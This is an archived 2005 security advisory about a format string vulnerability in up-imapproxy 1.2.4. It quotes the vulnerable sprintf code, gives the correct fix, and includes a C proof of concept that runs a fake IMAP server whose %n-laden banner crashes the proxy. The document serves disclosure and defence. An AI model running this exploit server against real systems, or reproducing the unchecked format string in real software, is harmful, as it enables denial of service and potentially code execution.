[UNIX] up-imapproxy Format String Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 11/01/05

  • Next message: SecuriTeam: "[EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit #2)"
    To: list@securiteam.com
    Date: 1 Nov 2005 16:12:10 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      up-imapproxy Format String Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://imapproxy.org/> up-imapproxy "proxies IMAP transactions between
    an IMAP client and an IMAP server". A format string vulnerability in
    up-imapproxy's handling of the response server's banner allows attackers
    to cause the program to execute arbitrary code.

    DETAILS

    Vulnerable Systems:
     * up-imapproxy version 1.2.4 and prior

    Vulnerable code:
    /up-imapproxy-1.2.4/src/main.c

    function: ParseBannerAndCapability();
    static int ParseBannerAndCapability( char *DestBuf,
              unsigned int DestBufSize,
              char *SourceBuf,
              unsigned int SourceBufSize )
    {
    ..
        SourceBuf[SourceBufSize - 2] = '\0';
        CP = strtok( SourceBuf, " " );
    ..
    sprintf( DestBuf, CP );
    ..
    }

    This function uses in another function from main.c.

    function: SetBannerAndCapability()

    static void SetBannerAndCapability( void )
    {
    ..
        BannerLen = ParseBannerAndCapability( Banner, sizeof Banner - 1,
           itd.ReadBuf, BytesRead );
    ..
        if ( strncasecmp( Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK))
    )
        {
     syslog(LOG_ERR, "%s: Unexpected response from imap server on initial
    connection: %s -- Exiting.", fn, Banner);
     close( itd.conn->sd );
     exit( 1 );
        }
    ..
    }

    As you can see ParseBannerAndCapability() function calls vulnerable
    sprintf() without format string. A correct call would be of the sorts of:
    sprintf( DestBuf, "%s", CP );

    Instead
    sprintf( DestBuf, CP );

    Vulnerability can be used to execute arbitary code on target's machine.
    Imapproxy incorrectly parse banner from IMAP daemon. Look at below PoC
    code.

    Proof of Concept:
    /*
     PoC exploit code for up-imapproxy <= 1.2.4
     by Darkeagle from ExploiterZ Labs
     
     eagle [ at ] exploiterz [ dot ] org
     
     an exploit binds port (143) and when imapproxy connects to this
    exploit-server and gets banner, it's child process crashes..
     
    */

    #include <stdio.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>
    #include <unistd.h>

    #define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n"

    int main ( int argc, char *argv[] )
    {
    struct sockaddr_in addr, cl_addr;
    int sock, cl_sock, addr_size;
    char *Iaddr;
    socklen_t l;

    printf("Imapproxy <= 1.2.4 PoC Exploit\n");

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

    addr.sin_family = AF_INET;
    addr.sin_port = htons(143);
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");

    bind(sock, (struct sockaddr*)&addr, sizeof(addr));
    listen(sock, 5);

    addr_size = sizeof(addr);

    while (1)
    {
     cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l);
     Iaddr = inet_ntoa(cl_addr.sin_addr);
     send(cl_sock, BANNER, strlen(BANNER), 0);
     printf("IP: %s\n", Iaddr);
    }

    return 0;

    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:eagle@exploiterz.org>
    Darkeagle.
    The original article can be found at:
    <http://exploiterz.org/adv/up-imapproxy.txt>
    http://exploiterz.org/adv/up-imapproxy.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit #2)"

    Relevant Pages

    • [EXPL] TWiki Search Function Arbitrary Command Execution (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... a vulnerability in TWiki's search ... engine allows a remote attacker to cause it to execute arbitrary code. ... &banner unless; ...
      (Securiteam)
    • [UNIX] Trend Micro VirusWall Buffer Overflow in VSAPI Library
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... buffer overflow vulnerability in VSAPI library allows arbitrary code ... is called "vscan" which is set suid root by default. ... permissions and thus granted all local users the privilege to execute the ...
      (Securiteam)
    • [UNIX] SCO Multiple Local Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Local exploitation of a buffer overflow vulnerability in the ppp binary, ... allows attackers to gain root privileges. ...
      (Securiteam)
    • [NT] Microsoft Word 6.0/95 Document Converter Buffer Overflow (MS04-041)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WordPad is "a word processing application that uses the MFC rich edit ... Remote exploitation of a buffer overflow vulnerability in Microsoft ... Microsoft Word format files into the Rich Text Format natively handled by ...
      (Securiteam)
    • [UNIX] Tikiwiki Command Injection and Arbitrary File Exposure Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Two security vulnerabilities have been recently discovered in Tikiwiki, ... Remote exploitation of an input validation vulnerability in Tikiwiki ... allows attackers to gain access to arbitrary files on the vulnerable ...
      (Securiteam)